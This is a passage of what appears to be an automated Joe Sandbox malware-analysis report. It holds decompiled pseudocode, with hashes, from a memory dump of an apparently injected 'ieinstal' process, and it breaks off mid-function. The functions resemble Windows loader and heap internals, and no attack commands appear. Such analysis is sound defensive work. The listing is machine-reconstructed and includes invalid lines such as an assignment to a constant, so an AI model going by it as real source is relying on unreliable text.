                        0x1ed1dcbf
                        0x1ed1dcc2
                        0x00000000
                        0x1ed1dc3c
                        0x1ed1dc41
                        0x1ed1dc43
                        0x00000000
                        0x1ed1dc45
                        0x1ed1dc45
                        0x1ed1dc47
                        0x00000000
                        0x1ed1dc4d
                        0x1ed1dc4d
                        0x1ed1dc50
                        0x1ed1dc52
                        0x1ed1dc55
                        0x1ed1dcfa
                        0x1ed1dcfe
                        0x1ed1dd08
                        0x1ed1dd0a
                        0x1ed1dd0c
                        0x00000000
                        0x1ed1dd12
                        0x1ed1dd15
                        0x1ed1dd2d
                        0x1ed1dd2f
                        0x1ed1dd32
                        0x1ed1dd35
                        0x00000000
                        0x1ed1dd35
                        0x1ed1dc5b
                        0x1ed1dc5b
                        0x1ed1dc5e
                        0x1ed1dc61
                        0x1ed1dc64
                        0x1ed1dc67
                        0x1ed1dc67
                        0x1ed1dc6a
                        0x1ed1dc6c
                        0x1ed1dc8e
                        0x1ed1dc8e
                        0x1ed1dc91
                        0x1ed1dc93
                        0x1ed1dcce
                        0x1ed1dcce
                        0x1ed1dc95
                        0x1ed1dc9c
                        0x1ed1dc6e
                        0x1ed1dc72
                        0x1ed1dc75
                        0x1ed1dc77
                        0x1ed1dc79
                        0x1ed6b551
                        0x1ed6b551
                        0x00000000
                        0x1ed1dc7f
                        0x1ed1dc7f
                        0x1ed1dc81
                        0x00000000
                        0x1ed1dc83
                        0x1ed1dc86
                        0x1ed1dc88
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x1ed1dc88
                        0x1ed1dc81
                        0x1ed1dc79
                        0x1ed1dc6c
                        0x1ed1dc55
                        0x1ed1dc47
                        0x1ed1dc43
                        0x00000000
                        0x1ed1dc36
                        0x1ed1dc23
                        0x00000000
                        0x1ed1dbff
                        0x1ed1dbf1
                        0x1ed1dbdf
                        0x1ed1db8f
                        0x1ed1db92
                        0x1ed1db95
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x1ed1db95
                        0x1ed1db8d
                        0x1ed1db85
                        0x1ed1db74
                        0x1ed1dc9f
                        0x1ed1dca2
                        0x1ed1dcb0
                        0x1ed1dcb0
                        0x1ed1dad1
                        0x1ed6b4e5
                        0x1ed6b4c8
                        0x00000000
                        0x00000000
                        0x00000000
                        0x1ed1d831
                        0x1ed1d80d
                        0x00000000
                        0x1ed1d800
                        0x1ed6b47f
                        0x1ed6b485
                        0x00000000
                        0x1ed6b485
                        0x1ed1d665
                        0x1ed1d652
                        0x00000000

                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: f8d187d43ab7421a6603b2d41441d45e71a85f593443be3f1c260b25820c8f91
                        • Instruction ID: e5f3f71b0f262f07446e61601676f466f6e193160f072797cc9c2f9e00583a65
                        • Opcode Fuzzy Hash: f8d187d43ab7421a6603b2d41441d45e71a85f593443be3f1c260b25820c8f91
                        • Instruction Fuzzy Hash: ADE1C234A0039ACFDB20DF15D990BA9B7B2BF85305F1143A9D94A9F290D734ED86CB51
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 92%
                        			E1ED1849B(signed int __ebx, intOrPtr __ecx, signed int __edi, signed int __esi, void* __eflags) {
                        				void* _t136;
                        				signed int _t139;
                        				signed int _t141;
                        				signed int _t145;
                        				intOrPtr _t146;
                        				signed int _t149;
                        				signed int _t150;
                        				signed int _t161;
                        				signed int _t163;
                        				signed int _t165;
                        				signed int _t169;
                        				signed int _t171;
                        				signed int _t194;
                        				signed int _t200;
                        				void* _t201;
                        				signed int _t204;
                        				signed int _t206;
                        				signed int _t210;
                        				signed int _t214;
                        				signed int _t215;
                        				signed int _t218;
                        				void* _t221;
                        				signed int _t224;
                        				signed int _t226;
                        				intOrPtr _t228;
                        				signed int _t232;
                        				signed int _t233;
                        				signed int _t234;
                        				void* _t237;
                        				void* _t238;
                        
                        				_t236 = __esi;
                        				_t235 = __edi;
                        				_t193 = __ebx;
                        				_push(0x70);
                        				_push(0x1eddf9c0);
                        				E1ED5D0E8(__ebx, __edi, __esi);
                        				 *((intOrPtr*)(_t237 - 0x5c)) = __ecx;
                        				if( *0x1edf7b04 == 0) {
                        					L4:
                        					goto L5;
                        				} else {
                        					_t136 = E1ED1CEE4( *((intOrPtr*)(__ecx + 0x18)), 1, 9, _t237 - 0x58, _t237 - 0x54);
                        					_t236 = 0;
                        					if(_t136 < 0) {
                        						 *((intOrPtr*)(_t237 - 0x54)) = 0;
                        					}
                        					if( *((intOrPtr*)(_t237 - 0x54)) != 0) {
                        						_t193 =  *( *[fs:0x30] + 0x18);
                        						 *(_t237 - 0x48) =  *( *[fs:0x30] + 0x18);
                        						 *(_t237 - 0x68) = _t236;
                        						 *(_t237 - 0x6c) = _t236;
                        						_t235 = _t236;
                        						 *(_t237 - 0x60) = _t236;
                        						E1ED22280( *[fs:0x30], 0x1edf8550);
                        						_t139 =  *0x1edf7b04; // 0x8
                        						__eflags = _t139 - 1;
                        						if(__eflags != 0) {
                        							_t200 = 0xc;
                        							_t201 = _t237 - 0x40;
                        							_t141 = E1ED3F3D5(_t201, _t139 * _t200, _t139 * _t200 >> 0x20);
                        							 *(_t237 - 0x44) = _t141;
                        							__eflags = _t141;
                        							if(_t141 < 0) {
                        								L50:
                        								E1ED1FFB0(_t193, _t235, 0x1edf8550);
                        								L5:
                        								return E1ED5D130(_t193, _t235, _t236);
                        							}
                        							_push(_t201);
                        							_t221 = 0x10;
                        							_t202 =  *(_t237 - 0x40);
                        							_t145 = E1ED01C45( *(_t237 - 0x40), _t221);
                        							 *(_t237 - 0x44) = _t145;
                        							__eflags = _t145;
                        							if(_t145 < 0) {
                        								goto L50;
                        							}
                        							_t146 =  *0x1edf7b9c; // 0x0
                        							_t235 = L1ED24620(_t202, _t193, _t146 + 0xc0000,  *(_t237 - 0x40));
                        							 *(_t237 - 0x60) = _t235;
                        							__eflags = _t235;
                        							if(_t235 == 0) {
                        								_t149 = 0xc0000017;
                        								 *(_t237 - 0x44) = 0xc0000017;
                        							} else {
                        								_t149 =  *(_t237 - 0x44);
                        							}
                        							__eflags = _t149;
                        							if(__eflags >= 0) {
                        								L8:
                        								 *(_t237 - 0x64) = _t235;
                        								_t150 =  *0x1edf7b10; // 0x10
                        								 *(_t237 - 0x4c) = _t150;
                        								_push(_t237 - 0x74);
                        								_push(_t237 - 0x39);
                        								_push(_t237 - 0x58);
                        								_t193 = E1ED3A61C(_t193,  *((intOrPtr*)(_t237 - 0x54)),  *((intOrPtr*)(_t237 - 0x5c)), _t235, _t236, __eflags);
                        								 *(_t237 - 0x44) = _t193;
                        								__eflags = _t193;
                        								if(_t193 < 0) {
                        									L30:
                        									E1ED1FFB0(_t193, _t235, 0x1edf8550);
                        									__eflags = _t235 - _t237 - 0x38;
                        									if(_t235 != _t237 - 0x38) {
                        										_t235 =  *(_t237 - 0x48);
                        										L1ED277F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x48));
                        									} else {
                        										_t235 =  *(_t237 - 0x48);
                        									}
                        									__eflags =  *(_t237 - 0x6c);
                        									if( *(_t237 - 0x6c) != 0) {
                        										L1ED277F0(_t235, _t236,  *(_t237 - 0x6c));
                        									}
                        									__eflags = _t193;
                        									if(_t193 >= 0) {
                        										goto L4;
                        									} else {
                        										goto L5;
                        									}
                        								}
                        								_t204 =  *0x1edf7b04; // 0x8
                        								 *(_t235 + 8) = _t204;
                        								__eflags =  *((char*)(_t237 - 0x39));
                        								if( *((char*)(_t237 - 0x39)) != 0) {
                        									 *(_t235 + 4) = 1;
                        									 *(_t235 + 0xc) =  *(_t237 - 0x4c);
                        									_t161 =  *0x1edf7b10; // 0x10
                        									 *(_t237 - 0x4c) = _t161;
                        								} else {
                        									 *(_t235 + 4) = _t236;
                        									 *(_t235 + 0xc) =  *(_t237 - 0x58);
                        								}
                        								 *((intOrPtr*)(_t237 - 0x54)) = E1ED437C5( *((intOrPtr*)(_t237 - 0x74)), _t237 - 0x70);
                        								_t224 = _t236;
                        								 *(_t237 - 0x40) = _t236;
                        								 *(_t237 - 0x50) = _t236;
                        								while(1) {
                        									_t163 =  *(_t235 + 8);
                        									__eflags = _t224 - _t163;
                        									if(_t224 >= _t163) {
                        										break;
                        									}
                        									_t228 =  *0x1edf7b9c; // 0x0
                        									_t214 = L1ED24620( *((intOrPtr*)(_t237 - 0x54)) + 1,  *(_t237 - 0x48), _t228 + 0xc0000,  *(_t237 - 0x70) +  *((intOrPtr*)(_t237 - 0x54)) + 1);
                        									 *(_t237 - 0x78) = _t214;
                        									__eflags = _t214;
                        									if(_t214 == 0) {
                        										L52:
                        										_t193 = 0xc0000017;
                        										L19:
                        										 *(_t237 - 0x44) = _t193;
                        										L20:
                        										_t206 =  *(_t237 - 0x40);
                        										__eflags = _t206;
                        										if(_t206 == 0) {
                        											L26:
                        											__eflags = _t193;
                        											if(_t193 < 0) {
                        												E1ED437F5( *((intOrPtr*)(_t237 - 0x5c)), _t237 - 0x6c);
                        												__eflags =  *((char*)(_t237 - 0x39));
                        												if( *((char*)(_t237 - 0x39)) != 0) {
                        													 *0x1edf7b10 =  *0x1edf7b10 - 8;
                        												}
                        											} else {
                        												_t169 =  *(_t237 - 0x68);
                        												__eflags = _t169;
                        												if(_t169 != 0) {
                        													 *0x1edf7b04 =  *0x1edf7b04 - _t169;
                        												}
                        											}
                        											__eflags = _t193;
                        											if(_t193 >= 0) {
                        												 *((short*)( *((intOrPtr*)(_t237 - 0x5c)) + 0x3a)) = 0xffff;
                        											}
                        											goto L30;
                        										}
                        										_t226 = _t206 * 0xc;
                        										__eflags = _t226;
                        										_t194 =  *(_t237 - 0x48);
                        										do {
                        											 *(_t237 - 0x40) = _t206 - 1;
                        											_t226 = _t226 - 0xc;
                        											 *(_t237 - 0x4c) = _t226;
                        											__eflags =  *(_t235 + _t226 + 0x10) & 0x00000002;
                        											if(( *(_t235 + _t226 + 0x10) & 0x00000002) == 0) {
                        												__eflags =  *(_t235 + _t226 + 0x10) & 0x00000001;
                        												if(( *(_t235 + _t226 + 0x10) & 0x00000001) == 0) {
                        													 *(_t237 - 0x68) =  *(_t237 - 0x68) + 1;
                        													_t210 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
                        													__eflags =  *((char*)(_t237 - 0x39));
                        													if( *((char*)(_t237 - 0x39)) == 0) {
                        														_t171 = _t210;
                        													} else {
                        														 *(_t237 - 0x50) =  *(_t210 +  *(_t237 - 0x58) * 4);
                        														L1ED277F0(_t194, _t236, _t210 - 8);
                        														_t171 =  *(_t237 - 0x50);
                        													}
                        													L48:
                        													L1ED277F0(_t194, _t236,  *((intOrPtr*)(_t171 - 4)));
                        													L46:
                        													_t206 =  *(_t237 - 0x40);
                        													_t226 =  *(_t237 - 0x4c);
                        													goto L24;
                        												}
                        												 *0x1edf7b08 =  *0x1edf7b08 + 1;
                        												goto L24;
                        											}
                        											_t171 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
                        											__eflags = _t171;
                        											if(_t171 != 0) {
                        												__eflags =  *((char*)(_t237 - 0x39));
                        												if( *((char*)(_t237 - 0x39)) == 0) {
                        													goto L48;
                        												}
                        												E1ED457C2(_t171,  *((intOrPtr*)(_t235 + _t226 + 0x18)));
                        												goto L46;
                        											}
                        											L24:
                        											__eflags = _t206;
                        										} while (_t206 != 0);
                        										_t193 =  *(_t237 - 0x44);
                        										goto L26;
                        									}
                        									_t232 =  *(_t237 - 0x70) + 0x00000001 + _t214 &  !( *(_t237 - 0x70));
                        									 *(_t237 - 0x7c) = _t232;
                        									 *(_t232 - 4) = _t214;
                        									 *(_t237 - 4) = _t236;
                        									E1ED4F3E0(_t232,  *((intOrPtr*)( *((intOrPtr*)(_t237 - 0x74)) + 8)),  *((intOrPtr*)(_t237 - 0x54)));
                        									_t238 = _t238 + 0xc;
                        									 *(_t237 - 4) = 0xfffffffe;
                        									_t215 =  *(_t237 - 0x48);
                        									__eflags = _t193;
                        									if(_t193 < 0) {
                        										L1ED277F0(_t215, _t236,  *(_t237 - 0x78));
                        										goto L20;
                        									}
                        									__eflags =  *((char*)(_t237 - 0x39));
                        									if( *((char*)(_t237 - 0x39)) != 0) {
                        										_t233 = E1ED3A44B( *(_t237 - 0x4c));
                        										 *(_t237 - 0x50) = _t233;
                        										__eflags = _t233;
                        										if(_t233 == 0) {
                        											L1ED277F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x78));
                        											goto L52;
                        										}
                        										 *(_t233 +  *(_t237 - 0x58) * 4) =  *(_t237 - 0x7c);
                        										L17:
                        										_t234 =  *(_t237 - 0x40);
                        										_t218 = _t234 * 0xc;
                        										 *(_t218 +  *(_t237 - 0x64) + 0x14) =  *(_t237 - 0x50);
                        										 *(_t218 + _t235 + 0x10) = _t236;
                        										_t224 = _t234 + 1;
                        										 *(_t237 - 0x40) = _t224;
                        										 *(_t237 - 0x50) = _t224;
                        										_t193 =  *(_t237 - 0x44);
                        										continue;
                        									}
                        									 *(_t237 - 0x50) =  *(_t237 - 0x7c);
                        									goto L17;
                        								}
                        								 *_t235 = _t236;
                        								_t165 = 0x10 + _t163 * 0xc;
                        								__eflags = _t165;
                        								_push(_t165);
                        								_push(_t235);
                        								_push(0x23);
                        								_push(0xffffffff);
                        								_t193 = E1ED496C0();
                        								goto L19;
                        							} else {
                        								goto L50;
                        							}
                        						}
                        						_t235 = _t237 - 0x38;
                        						 *(_t237 - 0x60) = _t235;
                        						goto L8;
                        					}
                        					goto L4;
                        				}
                        			}

                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 47edd2a2b44d3e6e17051d352f2bb3dae98d7bcc041763876cda7bdab4e4f520
                        • Instruction ID: 7cd7e4fe8bc3b030a094a6411527962bc06dd65224cbb67597f88915058a69f5
                        • Opcode Fuzzy Hash: 47edd2a2b44d3e6e17051d352f2bb3dae98d7bcc041763876cda7bdab4e4f520
                        • Instruction Fuzzy Hash: 01B16B78E00249DFDB14CFA9D991ADDFBB6FF48304F14462AE405AB385D770A946CB90
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 67%
                        			E1ED3513A(intOrPtr __ecx, void* __edx) {
                        				signed int _v8;
                        				signed char _v16;
                        				intOrPtr _v20;
                        				intOrPtr _v24;
                        				char _v28;
                        				signed int _v32;
                        				signed int _v36;
                        				signed int _v40;
                        				intOrPtr _v44;
                        				intOrPtr _v48;
                        				char _v63;
                        				char _v64;
                        				signed int _v72;
                        				signed int _v76;
                        				signed int _v80;
                        				signed int _v84;
                        				signed int _v88;
                        				signed char* _v92;
                        				signed int _v100;
                        				signed int _v104;
                        				char _v105;
                        				void* __ebx;
                        				void* __edi;
                        				void* __esi;
                        				void* _t157;
                        				signed int _t159;
                        				signed int _t160;
                        				unsigned int* _t161;
                        				intOrPtr _t165;
                        				signed int _t172;
                        				signed char* _t181;
                        				intOrPtr _t189;
                        				intOrPtr* _t200;
                        				signed int _t202;
                        				signed int _t203;
                        				char _t204;
                        				signed int _t207;
                        				signed int _t208;
                        				void* _t209;
                        				intOrPtr _t210;
                        				signed int _t212;
                        				signed int _t214;
                        				signed int _t221;
                        				signed int _t222;
                        				signed int _t226;
                        				intOrPtr* _t232;
                        				signed int _t233;
                        				signed int _t234;
                        				intOrPtr _t237;
                        				intOrPtr _t238;
                        				intOrPtr _t240;
                        				void* _t245;
                        				signed int _t246;
                        				signed int _t247;
                        				void* _t248;
                        				void* _t251;
                        				void* _t252;
                        				signed int _t253;
                        				signed int _t255;
                        				signed int _t256;
                        
                        				_t255 = (_t253 & 0xfffffff8) - 0x6c;
                        				_v8 =  *0x1edfd360 ^ _t255;
                        				_v32 = _v32 & 0x00000000;
                        				_t251 = __edx;
                        				_t237 = __ecx;
                        				_t212 = 6;
                        				_t245 =  &_v84;
                        				_t207 =  *((intOrPtr*)(__ecx + 0x48));
                        				_v44 =  *((intOrPtr*)(__edx + 0xc8));
                        				_v48 = __ecx;
                        				_v36 = _t207;
                        				_t157 = memset(_t245, 0, _t212 << 2);
                        				_t256 = _t255 + 0xc;
                        				_t246 = _t245 + _t212;
                        				if(_t207 == 2) {
                        					_t247 =  *(_t237 + 0x60);
                        					_t208 =  *(_t237 + 0x64);
                        					_v63 =  *((intOrPtr*)(_t237 + 0x4c));
                        					_t159 =  *((intOrPtr*)(_t237 + 0x58));
                        					_v104 = _t159;
                        					_v76 = _t159;
                        					_t160 =  *((intOrPtr*)(_t237 + 0x5c));
                        					_v100 = _t160;
                        					_v72 = _t160;
                        					L19:
                        					_v80 = _t208;
                        					_v84 = _t247;
                        					L8:
                        					_t214 = 0;
                        					if( *(_t237 + 0x74) > 0) {
                        						_t82 = _t237 + 0x84; // 0x124
                        						_t161 = _t82;
                        						_v92 = _t161;
                        						while( *_t161 >> 0x1f != 0) {
                        							_t200 = _v92;
                        							if( *_t200 == 0x80000000) {
                        								break;
                        							}
                        							_t214 = _t214 + 1;
                        							_t161 = _t200 + 0x10;
                        							_v92 = _t161;
                        							if(_t214 <  *(_t237 + 0x74)) {
                        								continue;
                        							}
                        							goto L9;
                        						}
                        						_v88 = _t214 << 4;
                        						_v40 = _t237 +  *((intOrPtr*)(_v88 + _t237 + 0x78));
                        						_t165 = 0;
                        						asm("adc eax, [ecx+edx+0x7c]");
                        						_v24 = _t165;
                        						_v28 = _v40;
                        						_v20 =  *((intOrPtr*)(_v88 + _t237 + 0x80));
                        						_t221 = _v40;
                        						_v16 =  *_v92;
                        						_v32 =  &_v28;
                        						if( *(_t237 + 0x4e) >> 0xf == 0) {
                        							goto L9;
                        						}
                        						_t240 = _v48;
                        						if( *_v92 != 0x80000000) {
                        							goto L9;
                        						}
                        						 *((intOrPtr*)(_t221 + 8)) = 0;
                        						 *((intOrPtr*)(_t221 + 0xc)) = 0;
                        						 *((intOrPtr*)(_t221 + 0x14)) = 0;
                        						 *((intOrPtr*)(_t221 + 0x10)) = _v20;
                        						_t226 = 0;
                        						_t181 = _t251 + 0x66;
                        						_v88 = 0;
                        						_v92 = _t181;
                        						do {
                        							if( *((char*)(_t181 - 2)) == 0) {
                        								goto L31;
                        							}
                        							_t226 = _v88;
                        							if(( *_t181 & 0x000000ff) == ( *(_t240 + 0x4e) & 0x7fff)) {
                        								_t181 = E1ED4D0F0(1, _t226 + 0x20, 0);
                        								_t226 = _v40;
                        								 *(_t226 + 8) = _t181;
                        								 *((intOrPtr*)(_t226 + 0xc)) = 0;
                        								L34:
                        								if(_v44 == 0) {
                        									goto L9;
                        								}
                        								_t210 = _v44;
                        								_t127 = _t210 + 0x1c; // 0x1c
                        								_t249 = _t127;
                        								E1ED22280(_t181, _t127);
                        								 *(_t210 + 0x20) =  *( *[fs:0x18] + 0x24);
                        								_t185 =  *((intOrPtr*)(_t210 + 0x94));
                        								if( *((intOrPtr*)(_t210 + 0x94)) != 0) {
                        									L1ED277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t185);
                        								}
                        								_t189 = L1ED24620(_t226,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v20 + 0x10);
                        								 *((intOrPtr*)(_t210 + 0x94)) = _t189;
                        								if(_t189 != 0) {
                        									 *((intOrPtr*)(_t189 + 8)) = _v20;
                        									 *( *((intOrPtr*)(_t210 + 0x94)) + 0xc) = _v16;
                        									_t232 =  *((intOrPtr*)(_t210 + 0x94));
                        									 *_t232 = _t232 + 0x10;
                        									 *(_t232 + 4) =  *(_t232 + 4) & 0x00000000;
                        									E1ED4F3E0( *((intOrPtr*)( *((intOrPtr*)(_t210 + 0x94)))), _v28, _v20);
                        									_t256 = _t256 + 0xc;
                        								}
                        								 *(_t210 + 0x20) =  *(_t210 + 0x20) & 0x00000000;
                        								E1ED1FFB0(_t210, _t249, _t249);
                        								_t222 = _v76;
                        								_t172 = _v80;
                        								_t208 = _v84;
                        								_t247 = _v88;
                        								L10:
                        								_t238 =  *((intOrPtr*)(_t251 + 0x1c));
                        								_v44 = _t238;
                        								if(_t238 != 0) {
                        									 *0x1edfb1e0(_v48 + 0x38, _v36, _v63, _t172, _t222, _t247, _t208, _v32,  *((intOrPtr*)(_t251 + 0x20)));
                        									_v44();
                        								}
                        								_pop(_t248);
                        								_pop(_t252);
                        								_pop(_t209);
                        								return E1ED4B640(0, _t209, _v8 ^ _t256, _t238, _t248, _t252);
                        							}
                        							_t181 = _v92;
                        							L31:
                        							_t226 = _t226 + 1;
                        							_t181 =  &(_t181[0x18]);
                        							_v88 = _t226;
                        							_v92 = _t181;
                        						} while (_t226 < 4);
                        						goto L34;
                        					}
                        					L9:
                        					_t172 = _v104;
                        					_t222 = _v100;
                        					goto L10;
                        				}
                        				_t247 = _t246 | 0xffffffff;
                        				_t208 = _t247;
                        				_v84 = _t247;
                        				_v80 = _t208;
                        				if( *((intOrPtr*)(_t251 + 0x4c)) == _t157) {
                        					_t233 = _v72;
                        					_v105 = _v64;
                        					_t202 = _v76;
                        				} else {
                        					_t204 =  *((intOrPtr*)(_t251 + 0x4d));
                        					_v105 = 1;
                        					if(_v63 <= _t204) {
                        						_v63 = _t204;
                        					}
                        					_t202 = _v76 |  *(_t251 + 0x40);
                        					_t233 = _v72 |  *(_t251 + 0x44);
                        					_t247 =  *(_t251 + 0x38);
                        					_t208 =  *(_t251 + 0x3c);
                        					_v76 = _t202;
                        					_v72 = _t233;
                        					_v84 = _t247;
                        					_v80 = _t208;
                        				}
                        				_v104 = _t202;
                        				_v100 = _t233;
                        				if( *((char*)(_t251 + 0xc4)) != 0) {
                        					_t237 = _v48;
                        					_v105 = 1;
                        					if(_v63 <=  *((intOrPtr*)(_t251 + 0xc5))) {
                        						_v63 =  *((intOrPtr*)(_t251 + 0xc5));
                        						_t237 = _v48;
                        					}
                        					_t203 = _t202 |  *(_t251 + 0xb8);
                        					_t234 = _t233 |  *(_t251 + 0xbc);
                        					_t247 = _t247 &  *(_t251 + 0xb0);
                        					_t208 = _t208 &  *(_t251 + 0xb4);
                        					_v104 = _t203;
                        					_v76 = _t203;
                        					_v100 = _t234;
                        					_v72 = _t234;
                        					_v84 = _t247;
                        					_v80 = _t208;
                        				}
                        				if(_v105 == 0) {
                        					_v36 = _v36 & 0x00000000;
                        					_t208 = 0;
                        					_t247 = 0;
                        					 *(_t237 + 0x74) =  *(_t237 + 0x74) & 0;
                        					goto L19;
                        				} else {
                        					_v36 = 1;
                        					goto L8;
                        				}
                        			}

                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: cf63ccbd4f78e526b52fa16dd44559859d8ff402cc27952dcb13903f60798497
                        • Instruction ID: 753ca9bb07de67c5b5794baf8e293bf553554f06dd3e313930eb9282a91cc6ec
                        • Opcode Fuzzy Hash: cf63ccbd4f78e526b52fa16dd44559859d8ff402cc27952dcb13903f60798497
                        • Instruction Fuzzy Hash: 7DC127759083818FD354CF28C590A5AFBF2BF88308F148A6EF9998B352D771E945CB52
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 74%
                        			E1ED303E2(signed int __ecx, signed int __edx) {
                        				signed int _v8;
                        				signed int _v12;
                        				signed int _v16;
                        				signed int _v20;
                        				signed int _v24;
                        				signed int _v28;
                        				signed int _v32;
                        				signed int _v36;
                        				intOrPtr _v40;
                        				signed int _v44;
                        				signed int _v48;
                        				char _v52;
                        				char _v56;
                        				char _v64;
                        				void* __ebx;
                        				void* __edi;
                        				void* __esi;
                        				signed int _t56;
                        				signed int _t58;
                        				char* _t64;
                        				intOrPtr _t65;
                        				signed int _t74;
                        				signed int _t79;
                        				char* _t83;
                        				intOrPtr _t84;
                        				signed int _t93;
                        				signed int _t94;
                        				signed char* _t95;
                        				signed int _t99;
                        				signed int _t100;
                        				signed char* _t101;
                        				signed int _t105;
                        				signed int _t119;
                        				signed int _t120;
                        				void* _t122;
                        				signed int _t123;
                        				signed int _t127;
                        
                        				_v8 =  *0x1edfd360 ^ _t127;
                        				_t119 = __ecx;
                        				_t105 = __edx;
                        				_t118 = 0;
                        				_v20 = __edx;
                        				_t120 =  *(__ecx + 0x20);
                        				if(E1ED30548(__ecx, 0) != 0) {
                        					_t56 = 0xc000022d;
                        					L23:
                        					return E1ED4B640(_t56, _t105, _v8 ^ _t127, _t118, _t119, _t120);
                        				} else {
                        					_v12 = _v12 | 0xffffffff;
                        					_t58 = _t120 + 0x24;
                        					_t109 =  *(_t120 + 0x18);
                        					_t118 = _t58;
                        					_v16 = _t58;
                        					E1ED1B02A( *(_t120 + 0x18), _t118, 0x14a5);
                        					_v52 = 0x18;
                        					_v48 = 0;
                        					0x840 = 0x40;
                        					if( *0x1edf7c1c != 0) {
                        					}
                        					_v40 = 0x840;
                        					_v44 = _t105;
                        					_v36 = 0;
                        					_v32 = 0;
                        					if(E1ED27D50() != 0) {
                        						_t64 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                        					} else {
                        						_t64 = 0x7ffe0384;
                        					}
                        					if( *_t64 != 0) {
                        						_t65 =  *[fs:0x30];
                        						__eflags =  *(_t65 + 0x240) & 0x00000004;
                        						if(( *(_t65 + 0x240) & 0x00000004) != 0) {
                        							_t100 = E1ED27D50();
                        							__eflags = _t100;
                        							if(_t100 == 0) {
                        								_t101 = 0x7ffe0385;
                        							} else {
                        								_t101 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                        							}
                        							__eflags =  *_t101 & 0x00000020;
                        							if(( *_t101 & 0x00000020) != 0) {
                        								_t118 = _t118 | 0xffffffff;
                        								_t109 = 0x1485;
                        								E1ED87016(0x1485, _t118, 0xffffffff, 0xffffffff, 0, 0);
                        							}
                        						}
                        					}
                        					_t105 = 0;
                        					while(1) {
                        						_push(0x60);
                        						_push(5);
                        						_push( &_v64);
                        						_push( &_v52);
                        						_push(0x100021);
                        						_push( &_v12);
                        						_t122 = E1ED49830();
                        						if(_t122 >= 0) {
                        							break;
                        						}
                        						__eflags = _t122 - 0xc0000034;
                        						if(_t122 == 0xc0000034) {
                        							L38:
                        							_t120 = 0xc0000135;
                        							break;
                        						}
                        						__eflags = _t122 - 0xc000003a;
                        						if(_t122 == 0xc000003a) {
                        							goto L38;
                        						}
                        						__eflags = _t122 - 0xc0000022;
                        						if(_t122 != 0xc0000022) {
                        							break;
                        						}
                        						__eflags = _t105;
                        						if(__eflags != 0) {
                        							break;
                        						}
                        						_t109 = _t119;
                        						_t99 = E1ED869A6(_t119, __eflags);
                        						__eflags = _t99;
                        						if(_t99 == 0) {
                        							break;
                        						}
                        						_t105 = _t105 + 1;
                        					}
                        					if( !_t120 >= 0) {
                        						L22:
                        						_t56 = _t120;
                        						goto L23;
                        					}
                        					if( *0x1edf7c04 != 0) {
                        						_t118 = _v12;
                        						_t120 = E1ED8A7AC(_t119, _t118, _t109);
                        						__eflags = _t120;
                        						if(_t120 >= 0) {
                        							goto L10;
                        						}
                        						__eflags =  *0x1edf7bd8;
                        						if( *0x1edf7bd8 != 0) {
                        							L20:
                        							if(_v12 != 0xffffffff) {
                        								_push(_v12);
                        								E1ED495D0();
                        							}
                        							goto L22;
                        						}
                        					}
                        					L10:
                        					_push(_v12);
                        					_t105 = _t119 + 0xc;
                        					_push(0x1000000);
                        					_push(0x10);
                        					_push(0);
                        					_push(0);
                        					_push(0xf);
                        					_push(_t105);
                        					_t120 = E1ED499A0();
                        					if(_t120 < 0) {
                        						__eflags = _t120 - 0xc000047e;
                        						if(_t120 == 0xc000047e) {
                        							L51:
                        							_t74 = E1ED83540(_t120);
                        							_t119 = _v16;
                        							_t120 = _t74;
                        							L52:
                        							_t118 = 0x1485;
                        							E1ED0B1E1(_t120, 0x1485, 0, _t119);
                        							goto L20;
                        						}
                        						__eflags = _t120 - 0xc000047f;
                        						if(_t120 == 0xc000047f) {
                        							goto L51;
                        						}
                        						__eflags = _t120 - 0xc0000462;
                        						if(_t120 == 0xc0000462) {
                        							goto L51;
                        						}
                        						_t119 = _v16;
                        						__eflags = _t120 - 0xc0000017;
                        						if(_t120 != 0xc0000017) {
                        							__eflags = _t120 - 0xc000009a;
                        							if(_t120 != 0xc000009a) {
                        								__eflags = _t120 - 0xc000012d;
                        								if(_t120 != 0xc000012d) {
                        									_v28 = _t119;
                        									_push( &_v56);
                        									_push(1);
                        									_v24 = _t120;
                        									_push( &_v28);
                        									_push(1);
                        									_push(2);
                        									_push(0xc000007b);
                        									_t79 = E1ED4AAF0();
                        									__eflags = _t79;
                        									if(_t79 >= 0) {
                        										__eflags =  *0x1edf8474 - 3;
